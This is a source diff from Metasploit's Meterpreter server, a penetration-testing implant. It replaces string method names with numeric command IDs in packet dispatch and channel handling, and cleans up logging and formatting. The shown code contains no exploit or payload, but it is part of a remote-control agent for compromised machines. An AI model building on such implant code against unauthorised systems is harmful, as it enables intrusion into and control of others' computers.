-						dprintf("[COMMAND] Failed to impersonate thread token (%s) (%u)", lpMethod, GetLastError());
+						dprintf("[COMMAND] Failed to impersonate thread token (%u) (%u)", commandId, GetLastError());
 					}
 				}
 
@@ -297,19 +300,19 @@ BOOL command_process_inline(Command *baseCommand, Command *extensionCommand, Rem
 				}
 
 				packetTlvType = packet_get_type(packet);
-				dprintf("[DISPATCH] Packet type for %s is %u", lpMethod, packetTlvType);
+				dprintf("[DISPATCH] Packet type for %u is %u", commandId, packetTlvType);
 				switch (packetTlvType)
 				{
 				case PACKET_TLV_TYPE_REQUEST:
 				case PACKET_TLV_TYPE_PLAIN_REQUEST:
 					if (command->request.inline_handler) {
-						dprintf("[DISPATCH] executing inline request handler %s", lpMethod);
+						dprintf("[DISPATCH] executing inline request handler %u", commandId);
 						serverContinue = command->request.inline_handler(remote, packet, &result) && serverContinue;
-						dprintf("[DISPATCH] executed %s, continue %s", lpMethod, serverContinue ? "yes" : "no");
+						dprintf("[DISPATCH] executed %u, continue %s", commandId, serverContinue ? "yes" : "no");
 					}
 					else
 					{
-						dprintf("[DISPATCH] executing request handler %s", lpMethod);
+						dprintf("[DISPATCH] executing request handler %u", commandId);
 						result = command->request.handler(remote, packet);
 					}
 					break;
@@ -317,12 +320,12 @@ BOOL command_process_inline(Command *baseCommand, Command *extensionCommand, Rem
 				case PACKET_TLV_TYPE_PLAIN_RESPONSE:
 					if (command->response.inline_handler)
 					{
-						dprintf("[DISPATCH] executing inline response handler %s", lpMethod);
+						dprintf("[DISPATCH] executing inline response handler %u", commandId);
 						serverContinue = command->response.inline_handler(remote, packet, &result) && serverContinue;
 					}
 					else
 					{
-						dprintf("[DISPATCH] executing response handler %s", lpMethod);
+						dprintf("[DISPATCH] executing response handler %u", commandId);
 						result = command->response.handler(remote, packet);
 					}
 					break;
@@ -343,12 +346,12 @@ BOOL command_process_inline(Command *baseCommand, Command *extensionCommand, Rem
 				packet_call_completion_handlers(remote, packet, requestId);
 			}
 
-			dprintf("[COMMAND] Completion handlers finished for %s.", lpMethod);
+			dprintf("[COMMAND] Completion handlers finished for %u.", commandId);
 		} while (0);
 	}
 	__except (EXCEPTION_EXECUTE_HANDLER)
 	{
-		dprintf("[COMMAND] Exception hit in command %s", lpMethod);
+		dprintf("[COMMAND] Exception hit in command %u", commandId);
 	}
 
 	if (!packet->local)
@@ -364,49 +367,49 @@ BOOL command_process_inline(Command *baseCommand, Command *extensionCommand, Rem
 
 /*!
  * @brief Attempt to locate a command in the base command list.
- * @param method String that identifies the command.
+ * @param commandId String that identifies the command.
  * @returns Pointer to the command entry in the base command list.
- * @retval NULL Indicates that no command was found for the given method.
+ * @retval NULL Indicates that no command was found for the given commandId.
  * @retval NON-NULL Pointer to the command that can be executed.
  */
-Command* command_locate_base(const char* method)
+Command* command_locate_base(UINT commandId)
 {
 	DWORD index;
 
-	dprintf("[COMMAND EXEC] Attempting to locate base command %s", method);
+	dprintf("[COMMAND EXEC] Attempting to locate base command %u", commandId);
-	for (index = 0; baseCommands[index].method; ++index)
+	for (index = 0; baseCommands[index].command_id; ++index)
 	{
-		if (strcmp(baseCommands[index].method, method) == 0)
+		if (baseCommands[index].command_id == commandId)
 		{
 			return &baseCommands[index];
 		}
 	}
 
-	dprintf("[COMMAND EXEC] Couldn't find base command %s", method);
+	dprintf("[COMMAND EXEC] Couldn't find base command %u", commandId);
 	return NULL;
 }
 
 /*!
  * @brief Attempt to locate a command in the extensions command list.
- * @param method String that identifies the command.
+ * @param commandId ID of the command to locate the associatd extension for.
  * @returns Pointer to the command entry in the extensions command list.
- * @retval NULL Indicates that no command was found for the given method.
+ * @retval NULL Indicates that no command was found for the given commandId.
  * @retval NON-NULL Pointer to the command that can be executed.
  */
-Command* command_locate_extension(const char* method)
+Command* command_locate_extension(UINT commandId)
 {
 	Command* command;
 
-	dprintf("[COMMAND EXEC] Attempting to locate extension command %s (%p)", method, extensionCommands);
+	dprintf("[COMMAND EXEC] Attempting to locate extension command %u (%p)", commandId, extensionCommands);
 	for (command = extensionCommands; command; command = command->next)
 	{
-		if (strcmp(command->method, method) == 0)
+		if (command->command_id == commandId)
 		{
 			return command;
 		}
 	}
 
-	dprintf("[COMMAND EXEC] Couldn't find extension command %s", method);
+	dprintf("[COMMAND EXEC] Couldn't find extension command %u", commandId);
 	return NULL;
 }
 
@@ -435,25 +438,24 @@ BOOL command_handle(Remote *remote, Packet *packet)
 	Command* extensionCommand = NULL;
 	Command** commands = NULL;
 	Packet* response = NULL;
-	PCHAR lpMethod = NULL;
+
-	Tlv methodTlv;
+	UINT commandId = packet_get_tlv_value_uint(packet, TLV_TYPE_COMMAND_ID);
 
 	do
 	{
-		if (packet_get_tlv_string(packet, TLV_TYPE_METHOD, &methodTlv) != ERROR_SUCCESS)
+
+		if (commandId == 0)
 		{
-			dprintf("[COMMAND] Unable to extract method from packet.");
+			dprintf("[COMMAND] Unable to extract commandId from packet.");
 			break;
 		}
 
-		lpMethod = (PCHAR)methodTlv.buffer;
+		baseCommand = command_locate_base(commandId);
-
+		extensionCommand = command_locate_extension(commandId);
-		baseCommand = command_locate_base(lpMethod);
-		extensionCommand = command_locate_extension(lpMethod);
 
 		if (baseCommand == NULL && extensionCommand == NULL)
 		{
-			dprintf("[DISPATCH] Command not found: %s", lpMethod);
+			dprintf("[DISPATCH] Command not found: %u", commandId);
 			// We have no matching command for this packet, so it won't get handled. We
 			// need to send an empty response and clean up here before exiting out.
 			response = packet_create_response(packet);
@@ -474,13 +476,13 @@ BOOL command_handle(Remote *remote, Packet *packet)
 			|| (extensionCommand && command_is_inline(extensionCommand, packet))
 			|| packet->local)
 		{
-			dprintf("[DISPATCH] Executing inline: %s", lpMethod);
+			dprintf("[DISPATCH] Executing inline: %u", commandId);
 			result = command_process_inline(baseCommand, extensionCommand, remote, packet);
 			dprintf("[DISPATCH] Executed inline: result %u (%x)", result, result);
 		}
 		else
 		{
-			dprintf("[DISPATCH] Executing in thread: %s", lpMethod);
+			dprintf("[DISPATCH] Executing in thread: %u", commandId);
 
 			commands = (Command**)malloc(sizeof(Command*) * 2);
 			*commands = baseCommand;

c/meterpreter/source/metsrv/base_dispatch.c

@@ -788,17 +788,17 @@ DWORD remote_request_core_transport_set_timeouts(Remote * remote, Packet * packe
  *      The channel type to allocate.  If set, the function returns, allowing
  *      a further up extension handler to allocate the channel.
  */
-DWORD remote_request_core_channel_open(Remote *remote, Packet *packet)
+DWORD remote_request_core_channel_open(Remote* remote, Packet* packet)
 {
-	Packet *response;
+	Packet* response;
 	DWORD res = ERROR_SUCCESS;
-	Channel *newChannel;
+	Channel* newChannel;
 	PCHAR channelType;
 	DWORD flags = 0;
 
 	do
 	{
-		dprintf( "[CHANNEL] Opening new channel for packet %p", packet );
+		dprintf("[CHANNEL] Opening new channel for packet %p", packet);
 
 		// If the channel open request had a specific channel type
 		if ((channelType = packet_get_tlv_value_string(packet, TLV_TYPE_CHANNEL_TYPE)))
@@ -810,11 +810,11 @@ DWORD remote_request_core_channel_open(Remote *remote, Packet *packet)
 		// Get any flags that were supplied
 		flags = packet_get_tlv_value_uint(packet, TLV_TYPE_FLAGS);
 
-		dprintf( "[CHANNEL] Opening %s %u", channelType, flags );
+		dprintf("[CHANNEL] Opening %s %u", channelType, flags);
 
 		// Allocate a response
 		response = packet_create_response(packet);
-		
+
 		// Did the response allocation fail?
 		if ((!response) || (!(newChannel = channel_create(0, flags))))
 		{
@@ -822,23 +822,24 @@ DWORD remote_request_core_channel_open(Remote *remote, Packet *packet)
 			break;
 		}
 
-		dprintf( "[CHANNEL] Opened %s %u", channelType, flags );
+		dprintf("[CHANNEL] Opened %s %u", channelType, flags);
 
 		// Get the channel class and set it
 		newChannel->cls = packet_get_tlv_value_uint(packet, TLV_TYPE_CHANNEL_CLASS);
 
-		dprintf( "[CHANNEL] Channel class for %s: %u", channelType, newChannel->cls );
+		dprintf("[CHANNEL] Channel class for %s: %u", channelType, newChannel->cls);
 
 		// Add the new channel identifier to the response
-		if ((res = packet_add_tlv_uint(response, TLV_TYPE_CHANNEL_ID,
+		if ((res = packet_add_tlv_uint(response, TLV_TYPE_CHANNEL_ID, channel_get_id(newChannel))) != ERROR_SUCCESS)
-				channel_get_id(newChannel))) != ERROR_SUCCESS)
+		{
 			break;
+		}
 
 		// Transmit the response
-		dprintf( "[CHANNEL] Sending response for %s", channelType  );
+		dprintf("[CHANNEL] Sending response for %s", channelType);
 		res = packet_transmit(remote, response, NULL);
 
-		dprintf( "[CHANNEL] Done" );
+		dprintf("[CHANNEL] Done");
 
 	} while (0);
 
@@ -1317,32 +1318,32 @@ DWORD remote_request_core_channel_tell(Remote *remote, Packet *packet)
  * req: TLV_TYPE_CHANNEL_ID -- The channel identifier to interact with
  * req: TLV_TYPE_BOOL       -- True if interactive, false if not.
  */
-DWORD remote_request_core_channel_interact(Remote *remote, Packet *packet)
+DWORD remote_request_core_channel_interact(Remote* remote, Packet* packet)
 {
-	Packet *response = packet_create_response(packet);
+	Packet* response = packet_create_response(packet);
-	Channel *channel = NULL;
+	Channel* channel = NULL;
 	DWORD channelId;
 	DWORD result = ERROR_SUCCESS;
 	BOOLEAN interact;
 
 	// Get the channel identifier
 	channelId = packet_get_tlv_value_uint(packet, TLV_TYPE_CHANNEL_ID);
-	interact  = packet_get_tlv_value_bool(packet, TLV_TYPE_BOOL);
+	interact = packet_get_tlv_value_bool(packet, TLV_TYPE_BOOL);
 
 	// If the channel is found, set the interactive flag accordingly
 	if ((channel = channel_find_by_id(channelId)))
 	{
-		lock_acquire( channel->lock );
+		lock_acquire(channel->lock);
 
 		// If the response packet is valid
-		if ((response) &&
+		if ((response) && (channel_get_class(channel) != CHANNEL_CLASS_BUFFERED))
-		    (channel_get_class(channel) != CHANNEL_CLASS_BUFFERED))
 		{
-			NativeChannelOps *native = (NativeChannelOps *)&channel->ops;
+			NativeChannelOps* native = (NativeChannelOps*)&channel->ops;
 
 			// Check to see if this channel has a registered interact handler
-			dprintf( "[DISPATCH] attempting to set interactive: %d context 0x%p", interact, native->context );
+			dprintf("[DISPATCH] attempting to set interactive: %d context 0x%p", interact, native->context);
-			if (native->interact) {
+			if (native->interact)
+			{
 				result = native->interact(channel, packet, native->context, interact);
 			}
 		}
@@ -1350,7 +1351,7 @@ DWORD remote_request_core_channel_interact(Remote *remote, Packet *packet)
 		// Set the channel's interactive state
 		channel_set_interactive(channel, interact);
 
-		lock_release( channel->lock );
+		lock_release(channel->lock);
 	}
 
 	// Send the response to the requestor so that the interaction can be 

c/meterpreter/source/metsrv/channel.c

@@ -260,8 +260,7 @@ PVOID channel_get_buffered_io_context(Channel *channel)
 DWORD channel_write_to_remote(Remote *remote, Channel *channel, PUCHAR chunk, 
 		ULONG chunkLength, PULONG bytesWritten)
 {
-	Packet *request = packet_create(PACKET_TLV_TYPE_REQUEST, 
+	Packet *request = packet_create(PACKET_TLV_TYPE_REQUEST, COMMAND_ID_CORE_CHANNEL_WRITE);
-			"core_channel_write");
 	DWORD res = ERROR_SUCCESS;
 	Tlv entries[2];
 	DWORD idNbo;
@@ -386,7 +385,7 @@ ChannelCompletionRoutine *channel_duplicate_completion_routine(
  * Channel completion routine dispatcher
  */
 DWORD _channel_packet_completion_routine(Remote *remote, Packet *packet, 
-		LPVOID context, LPCSTR method, DWORD result)
+		LPVOID context, UINT commandId, DWORD result)
 {
 	ChannelCompletionRoutine *comp = (ChannelCompletionRoutine *)context;
 	DWORD channelId = packet_get_tlv_value_uint(packet, TLV_TYPE_CHANNEL_ID);
@@ -394,17 +393,19 @@ DWORD _channel_packet_completion_routine(Remote *remote, Packet *packet,
 	DWORD res = ERROR_NOT_FOUND;
 
 
-	dprintf( "[CHANNEL] _channel_packet_completion_routine. channel=0x%08X method=%s", channel, method );
+	dprintf( "[CHANNEL] _channel_packet_completion_routine. channel=0x%08X commandId=%u", channel, commandId );
 
 	// If the channel was not found and it isn't an open request, return failure
-	if (!channel && strcmp(method, "core_channel_open"))
+	if (!channel && COMMAND_ID_CORE_CHANNEL_OPEN != commandId)
+	{
 		return ERROR_NOT_FOUND;
+	}
 
-	if ((!strcmp(method, "core_channel_open")) &&
+	if (COMMAND_ID_CORE_CHANNEL_OPEN == commandId && comp->routine.open)
-	    (comp->routine.open))
+	{
 		res = comp->routine.open(remote, channel, comp->context, result);
-	else if ((!strcmp(method, "core_channel_read")) &&
+	}
-	         (comp->routine.read))
+	else if (COMMAND_ID_CORE_CHANNEL_READ == commandId && comp->routine.read)
 	{
 		ULONG length = 0, realLength = 0;
 		PUCHAR buffer = NULL;
@@ -413,42 +414,42 @@ DWORD _channel_packet_completion_routine(Remote *remote, Packet *packet,
 		length = packet_get_tlv_value_uint(packet, TLV_TYPE_LENGTH);
 
 		// Allocate storage for it
-		if ((length) && (buffer = (PUCHAR)malloc(length)))
+		if (length && (buffer = (PUCHAR)malloc(length)))
 		{
 			memset(buffer, 0, length);
 
 			channel_read_from_buffered(channel, buffer, length, &realLength);
 		}
 
-		res = comp->routine.read(remote, channel, comp->context, result,
+		res = comp->routine.read(remote, channel, comp->context, result, buffer, realLength);
-				buffer, realLength);
 
 		if (buffer)
+		{
 			free(buffer);
+		}
 	}
-	else if ((!strcmp(method, "core_channel_write")) &&
+	else if (COMMAND_ID_CORE_CHANNEL_WRITE == commandId && comp->routine.write)
-	         (comp->routine.write))
 	{
 		Tlv lengthTlv;
 		ULONG length = 0;
 
 		// Get the number of bytes written to the channel
-		if ((packet_get_tlv(packet, TLV_TYPE_LENGTH, &lengthTlv)
+		if ((packet_get_tlv(packet, TLV_TYPE_LENGTH, &lengthTlv) == ERROR_SUCCESS) && (lengthTlv.header.length >= sizeof(DWORD)))
-				== ERROR_SUCCESS) &&
+		{
-		    (lengthTlv.header.length >= sizeof(DWORD)))
 			length = ntohl(*(LPDWORD)lengthTlv.buffer);
+		}
 
-		res = comp->routine.write(remote, channel, comp->context, result,
+		res = comp->routine.write(remote, channel, comp->context, result, length);
-				length);
 	}
-	else if ((!strcmp(method, "core_channel_close")) &&
+	else if (COMMAND_ID_CORE_CHANNEL_CLOSE == commandId && comp->routine.close)
-	         (comp->routine.close)) {
+	{
 		dprintf( "[CHANNEL] freeing up the completion context" );
 		res = comp->routine.close(remote, channel, comp->context, result);
 	}
-	else if ((!strcmp(method, "core_channel_interact")) &&
+	else if (COMMAND_ID_CORE_CHANNEL_INTERACT == commandId && comp->routine.interact)
-	         (comp->routine.interact))
+	{
 		res = comp->routine.interact(remote, channel, comp->context, result);
+	}
 
 	// Deallocate the completion context
 	dprintf( "[CHANNEL] freeing up the completion context" );
@@ -464,16 +465,13 @@ DWORD _channel_packet_completion_routine(Remote *remote, Packet *packet,
 DWORD channel_open(Remote *remote, Tlv *addend, DWORD addendLength, ChannelCompletionRoutine *completionRoutine)
 {
 	PacketRequestCompletion requestCompletion, *realRequestCompletion = NULL;
-	ChannelCompletionRoutine *dupe = NULL;
 	DWORD res = ERROR_SUCCESS;
-	PCHAR method = "core_channel_open";
+	Tlv commandIdTlv;
-	Packet *request;
-	Tlv methodTlv;
 
 	do
 	{
-		// Allocate the request
+		Packet* request = packet_create(PACKET_TLV_TYPE_REQUEST, 0);
-		if (!(request = packet_create(PACKET_TLV_TYPE_REQUEST, NULL)))
+		if (request == NULL)
 		{
 			res = ERROR_NOT_ENOUGH_MEMORY;
 			break;
@@ -483,18 +481,16 @@ DWORD channel_open(Remote *remote, Tlv *addend, DWORD addendLength, ChannelCompl
 		packet_add_tlvs(request, addend, addendLength);
 
 		// If no method TLV as added, add the default one.
-		if (packet_get_tlv(request, TLV_TYPE_METHOD, &methodTlv) != ERROR_SUCCESS)
+		if (packet_get_tlv(request, TLV_TYPE_COMMAND_ID, &commandIdTlv) != ERROR_SUCCESS)
 		{
-			packet_add_tlv_string(request, TLV_TYPE_METHOD, method);
+			packet_add_tlv_uint(request, TLV_TYPE_COMMAND_ID, COMMAND_ID_CORE_CHANNEL_OPEN);
 		}
 
 		// Initialize the packet completion routine
 		if (completionRoutine)
 		{
 			// Duplicate the completion routine
-			dupe = channel_duplicate_completion_routine(completionRoutine);
+			requestCompletion.context = channel_duplicate_completion_routine(completionRoutine);
-
-			requestCompletion.context = dupe;
 			requestCompletion.routine = _channel_packet_completion_routine;
 			realRequestCompletion = &requestCompletion;
 		}
@@ -511,20 +507,16 @@ DWORD channel_open(Remote *remote, Tlv *addend, DWORD addendLength, ChannelCompl
  * Read data from the remote end of the channel.
  */
 DWORD channel_read(Channel *channel, Remote *remote, Tlv *addend,
-	DWORD addendLength, ULONG length,
+	DWORD addendLength, ULONG length, ChannelCompletionRoutine *completionRoutine)
-	ChannelCompletionRoutine *completionRoutine)
 {
 	PacketRequestCompletion requestCompletion, *realRequestCompletion = NULL;
-	ChannelCompletionRoutine *dupe = NULL;
-	Packet *request;
 	DWORD res = ERROR_SUCCESS;
-	PCHAR method = "core_channel_read";
+	Tlv commandIdTlv;
-	Tlv methodTlv;
 
 	do
 	{
-		// Allocate an empty request
+		Packet* request= packet_create(PACKET_TLV_TYPE_REQUEST, 0);
-		if (!(request = packet_create(PACKET_TLV_TYPE_REQUEST, NULL)))
+		if (request == NULL)
 		{
 			res = ERROR_NOT_ENOUGH_MEMORY;
 			break;
@@ -534,9 +526,9 @@ DWORD channel_read(Channel *channel, Remote *remote, Tlv *addend,
 		packet_add_tlvs(request, addend, addendLength);
 
 		// If no method TLV as added, add the default one.
-		if (packet_get_tlv(request, TLV_TYPE_METHOD, &methodTlv) != ERROR_SUCCESS)
+		if (packet_get_tlv(request, TLV_TYPE_COMMAND_ID, &commandIdTlv) != ERROR_SUCCESS)
 		{
-			packet_add_tlv_string(request, TLV_TYPE_METHOD, method);
+			packet_add_tlv_uint(request, TLV_TYPE_COMMAND_ID, COMMAND_ID_CORE_CHANNEL_READ);
 		}
 
 		// Add the channel identifier and the length to read
@@ -547,9 +539,7 @@ DWORD channel_read(Channel *channel, Remote *remote, Tlv *addend,
 		if (completionRoutine)
 		{
 			// Duplicate the completion routine
-			dupe = channel_duplicate_completion_routine(completionRoutine);
+			requestCompletion.context = channel_duplicate_completion_routine(completionRoutine);
-
-			requestCompletion.context = dupe;
 			requestCompletion.routine = _channel_packet_completion_routine;
 			realRequestCompletion = &requestCompletion;
 		}
@@ -565,33 +555,35 @@ DWORD channel_read(Channel *channel, Remote *remote, Tlv *addend,
 /*
  * Write to the remote end of the channel
  */
-DWORD channel_write(Channel *channel, Remote *remote, Tlv *addend,
+DWORD channel_write(Channel *channel, Remote *remote, Tlv *addend, DWORD addendLength, PUCHAR buffer, ULONG length, ChannelCompletionRoutine *completionRoutine)
-	DWORD addendLength, PUCHAR buffer, ULONG length,
-	ChannelCompletionRoutine *completionRoutine)
 {
 	PacketRequestCompletion requestCompletion, *realRequestCompletion = NULL;
-	ChannelCompletionRoutine *dupe = NULL;
 	DWORD res = ERROR_SUCCESS;
-	LPCSTR method = "core_channel_write";
+	Tlv commandIdTlv;
-	Packet *request;
-	Tlv methodTlv;
 
 	do
 	{
-		// Allocate a request packet
+		Packet *request = packet_create(PACKET_TLV_TYPE_REQUEST, 0);
-		if (!(request = packet_create(PACKET_TLV_TYPE_REQUEST, NULL)))
+		if (request == NULL)
 		{
 			res = ERROR_NOT_ENOUGH_MEMORY;
 			break;
 		}
 
+		dprintf("[CHANNEL] channel_write: adding TLVs");
+
 		// Add the supplied TLVs
 		packet_add_tlvs(request, addend, addendLength);
 
 		// If no method TLV as added, add the default one.
-		if (packet_get_tlv(request, TLV_TYPE_METHOD, &methodTlv) != ERROR_SUCCESS)
+		if (packet_get_tlv(request, TLV_TYPE_COMMAND_ID, &commandIdTlv) != ERROR_SUCCESS)
 		{
-			packet_add_tlv_string(request, TLV_TYPE_METHOD, method);
+			dprintf("[CHANNEL] channel_write: adding command id of %u", COMMAND_ID_CORE_CHANNEL_WRITE);
+			packet_add_tlv_uint(request, TLV_TYPE_COMMAND_ID, COMMAND_ID_CORE_CHANNEL_WRITE);
+		}
+		else
+		{
+			dprintf("[CHANNEL] channel_write: apparently already have a command ID of %u", packet_get_tlv_value_uint(request, TLV_TYPE_COMMAND_ID));
 		}
 
 		// Add the channel identifier and the length to write
@@ -613,9 +605,7 @@ DWORD channel_write(Channel *channel, Remote *remote, Tlv *addend,
 		if (completionRoutine)
 		{
 			// Duplicate the completion routine
-			dupe = channel_duplicate_completion_routine(completionRoutine);
+			requestCompletion.context = channel_duplicate_completion_routine(completionRoutine);
-
-			requestCompletion.context = dupe;
 			requestCompletion.routine = _channel_packet_completion_routine;
 			realRequestCompletion = &requestCompletion;
 		}
@@ -635,15 +625,13 @@ DWORD channel_close(Channel *channel, Remote *remote, Tlv *addend,
 	DWORD addendLength, ChannelCompletionRoutine *completionRoutine)
 {
 	PacketRequestCompletion requestCompletion, *realRequestCompletion = NULL;
-	ChannelCompletionRoutine *dupe = NULL;
-	LPCSTR method = "core_channel_close";
 	DWORD res = ERROR_SUCCESS;
-	Packet *request;
+	Tlv commandIdTlv;
-	Tlv methodTlv;
 
 	do
 	{
-		if (!(request = packet_create(PACKET_TLV_TYPE_REQUEST, NULL)))
+		Packet *request = packet_create(PACKET_TLV_TYPE_REQUEST, 0);
+		if (request == NULL)
 		{
 			res = ERROR_NOT_ENOUGH_MEMORY;
 			break;
@@ -653,9 +641,9 @@ DWORD channel_close(Channel *channel, Remote *remote, Tlv *addend,
 		packet_add_tlvs(request, addend, addendLength);
 
 		// If no method TLV as added, add the default one.
-		if (packet_get_tlv(request, TLV_TYPE_METHOD, &methodTlv) != ERROR_SUCCESS)
+		if (packet_get_tlv(request, TLV_TYPE_COMMAND_ID, &commandIdTlv) != ERROR_SUCCESS)
 		{
-			packet_add_tlv_string(request, TLV_TYPE_METHOD, method);
+			packet_add_tlv_uint(request, TLV_TYPE_COMMAND_ID, COMMAND_ID_CORE_CHANNEL_CLOSE);
 		}
 
 		// Add the channel identifier
@@ -665,9 +653,7 @@ DWORD channel_close(Channel *channel, Remote *remote, Tlv *addend,
 		if (completionRoutine)
 		{
 			// Duplicate the completion routine
-			dupe = channel_duplicate_completion_routine(completionRoutine);
+			requestCompletion.context = channel_duplicate_completion_routine(completionRoutine);
-
-			requestCompletion.context = dupe;
 			requestCompletion.routine = _channel_packet_completion_routine;
 			realRequestCompletion = &requestCompletion;
 		}
@@ -687,19 +673,16 @@ DWORD channel_close(Channel *channel, Remote *remote, Tlv *addend,
  * forwarded in real time rather than being polled.
  */
 DWORD channel_interact(Channel *channel, Remote *remote, Tlv *addend,
-	DWORD addendLength, BOOL enable,
+	DWORD addendLength, BOOL enable, ChannelCompletionRoutine *completionRoutine)
-	ChannelCompletionRoutine *completionRoutine)
 {
 	PacketRequestCompletion requestCompletion, *realRequestCompletion = NULL;
-	ChannelCompletionRoutine *dupe = NULL;
-	LPCSTR method = "core_channel_interact";
 	DWORD res = ERROR_SUCCESS;
-	Packet *request;
+	Tlv commandIdTlv;
-	Tlv methodTlv;
 
 	do
 	{
-		if (!(request = packet_create(PACKET_TLV_TYPE_REQUEST, NULL)))
+		Packet* request = packet_create(PACKET_TLV_TYPE_REQUEST, 0);
+		if (request == NULL)
 		{
 			res = ERROR_NOT_ENOUGH_MEMORY;
 			break;
@@ -709,9 +692,9 @@ DWORD channel_interact(Channel *channel, Remote *remote, Tlv *addend,
 		packet_add_tlvs(request, addend, addendLength);
 
 		// If no method TLV as added, add the default one.
-		if (packet_get_tlv(request, TLV_TYPE_METHOD, &methodTlv) != ERROR_SUCCESS)
+		if (packet_get_tlv(request, TLV_TYPE_COMMAND_ID, &commandIdTlv) != ERROR_SUCCESS)
 		{
-			packet_add_tlv_string(request, TLV_TYPE_METHOD, method);
+			packet_add_tlv_uint(request, TLV_TYPE_COMMAND_ID, COMMAND_ID_CORE_CHANNEL_INTERACT);
 		}
 
 		// Add the channel identifier
@@ -724,9 +707,7 @@ DWORD channel_interact(Channel *channel, Remote *remote, Tlv *addend,
 		if (completionRoutine)
 		{
 			// Duplicate the completion routine
-			dupe = channel_duplicate_completion_routine(completionRoutine);
+			requestCompletion.context = channel_duplicate_completion_routine(completionRoutine);
-
-			requestCompletion.context = dupe;
 			requestCompletion.routine = _channel_packet_completion_routine;
 			realRequestCompletion = &requestCompletion;
 		}

c/meterpreter/source/metsrv/core.c

@@ -9,8 +9,7 @@
 #include "packet_encryption.h"
 #include <winhttp.h>
 
-DWORD packet_find_tlv_buf(Packet *packet, PUCHAR payload, DWORD payloadLength, DWORD index,
+DWORD packet_find_tlv_buf(Packet *packet, PUCHAR payload, DWORD payloadLength, DWORD index, TlvType type, Tlv *tlv);
-		TlvType type, Tlv *tlv);
 
 /*! @brief List element that contains packet completion routine details. */
 typedef struct _PacketCompletionRoutineEntry
@@ -133,10 +132,10 @@ VOID core_update_desktop(Remote * remote, DWORD dwSessionID, char * cpStationNam
 /*!
  * @brief Create a packet of a given type (request/response) and method.
  * @param type The TLV type that this packet represents.
- * @param method TLV method type (can be \c NULL).
+ * @param commandId TLV command Id 
  * @return Pointer to the newly created \c Packet.
  */
-Packet *packet_create(PacketTlvType type, LPCSTR method)
+Packet* packet_create(PacketTlvType type, UINT commandId)
 {
 	Packet *packet = NULL;
 	BOOL success = FALSE;
@@ -158,8 +157,7 @@ Packet *packet_create(PacketTlvType type, LPCSTR method)
 		packet->payload = NULL;
 		packet->payloadLength = 0;
 
-		// Add the method TLV if provided
+		if (commandId > 0 && packet_add_tlv_uint(packet, TLV_TYPE_COMMAND_ID, commandId) != ERROR_SUCCESS)
-		if (method && packet_add_tlv_string(packet, TLV_TYPE_METHOD, method) != ERROR_SUCCESS)
 		{
 			break;
 		}
@@ -242,7 +240,7 @@ DWORD packet_add_group(Packet* packet, TlvType type, Packet* groupPacket)
 Packet *packet_create_response(Packet *request)
 {
 	Packet *response = NULL;
-	Tlv method, requestId;
+	Tlv requestId;
 	BOOL success = FALSE;
 	PacketTlvType responseType;
 
@@ -255,17 +253,18 @@ Packet *packet_create_response(Packet *request)
 		responseType = PACKET_TLV_TYPE_RESPONSE;
 	}
 
+	UINT commandId = packet_get_tlv_value_uint(request, TLV_TYPE_COMMAND_ID);
+
 	do
 	{
-		// Get the request TLV's method
+		if (commandId == 0)
-		if (packet_get_tlv_string(request, TLV_TYPE_METHOD, &method) != ERROR_SUCCESS)
 		{
-			vdprintf("[PKT] Can't find method");
+			vdprintf("[PKT] Can't find command ID");
 			break;
 		}
 
 		// Try to allocate a response packet
-		if (!(response = packet_create(responseType, (PCHAR)method.buffer)))
+		if (!(response = packet_create(responseType, commandId)))
 		{
 			vdprintf("[PKT] Can't create response");
 			break;
@@ -1156,14 +1155,9 @@ DWORD packet_call_completion_handlers( Remote *remote, Packet *response, LPCSTR
 	PacketCompletionRoutineEntry *current;
 	DWORD result = packet_get_tlv_value_uint(response, TLV_TYPE_RESULT);
 	DWORD matches = 0;
-	Tlv methodTlv;
-	LPCSTR method = NULL;
 
-	// Get the method associated with this packet
+	// Get the command associated with this packet
-	if (packet_get_tlv_string(response, TLV_TYPE_METHOD, &methodTlv) == ERROR_SUCCESS)
+	UINT commandId = packet_get_tlv_value_uint(response, TLV_TYPE_COMMAND_ID);
-	{
-		method = (LPCSTR)methodTlv.buffer;
-	}
 
 	// Enumerate the completion routine list
 	for (current = packetCompletionRoutineList; current; current = current->next)
@@ -1176,7 +1170,7 @@ DWORD packet_call_completion_handlers( Remote *remote, Packet *response, LPCSTR
 		}
 
 		// Call the completion routine
-		current->handler.routine(remote, response, current->handler.context, method, result);
+		current->handler.routine(remote, response, current->handler.context, commandId, result);
 
 		// Increment the number of matched handlers
 		matches++;
@@ -1309,20 +1303,15 @@ DWORD packet_transmit(Remote* remote, Packet* packet, PacketRequestCompletion* c
 	{
 		// If a completion routine was supplied and the packet has a request
 		// identifier, insert the completion routine into the list
-		if ((completion) &&
+		if ((completion) && (packet_get_tlv_string(packet, TLV_TYPE_REQUEST_ID, &requestId) == ERROR_SUCCESS))
-			(packet_get_tlv_string(packet, TLV_TYPE_REQUEST_ID,
-			&requestId) == ERROR_SUCCESS))
 		{
 			packet_add_completion_handler((LPCSTR)requestId.buffer, completion);
 		}
 
 		encrypt_packet(remote, packet, &encryptedPacket, &encryptedPacketLength);
-		dprintf("[PACKET] Sending packet to remote, length: %u", encryptedPacketLength);
+		dprintf("[PACKET] Sending packet to remote, length: %u, command id: %u", encryptedPacketLength, packet_get_tlv_value_uint(packet, TLV_TYPE_COMMAND_ID));
-
-		dprintf("[PACKET] Remote: %p", remote);
-		dprintf("[PACKET] Transport: %p", remote->transport);
-		dprintf("[PACKET] Packet Transmit: %p", remote->transport->packet_transmit);
 		SetLastError(remote->transport->packet_transmit(remote, encryptedPacket, encryptedPacketLength));
+		dprintf("[PACKET] Sent packet to remote, length: %u, command id: %u, result: %u", encryptedPacketLength, packet_get_tlv_value_uint(packet, TLV_TYPE_COMMAND_ID), GetLastError());
 	} while (0);
 
 	res = GetLastError();

c/meterpreter/source/metsrv/core.h

@@ -14,7 +14,7 @@
 /*
  * Packet manipulation
  */
-Packet *packet_create(PacketTlvType type, LPCSTR method);
+Packet* packet_create(PacketTlvType type, UINT commandId);
 Packet *packet_create_response(Packet *packet);
 Packet* packet_create_group();
 Packet *packet_duplicate(Packet *packet);

c/meterpreter/source/metsrv/metsrv.h

@@ -53,21 +53,18 @@ VOID rand_xor_key(BYTE buffer[4]);
 DWORD server_setup(MetsrvConfig* config);
 typedef DWORD (*PSRVINIT)(MetApi* api, Remote *remote);
 typedef DWORD (*PSRVDEINIT)(Remote *remote);
-typedef DWORD (*PSRVGETNAME)(char* buffer, int bufferSize);
+typedef VOID (*PCMDADDED)(UINT command_id);
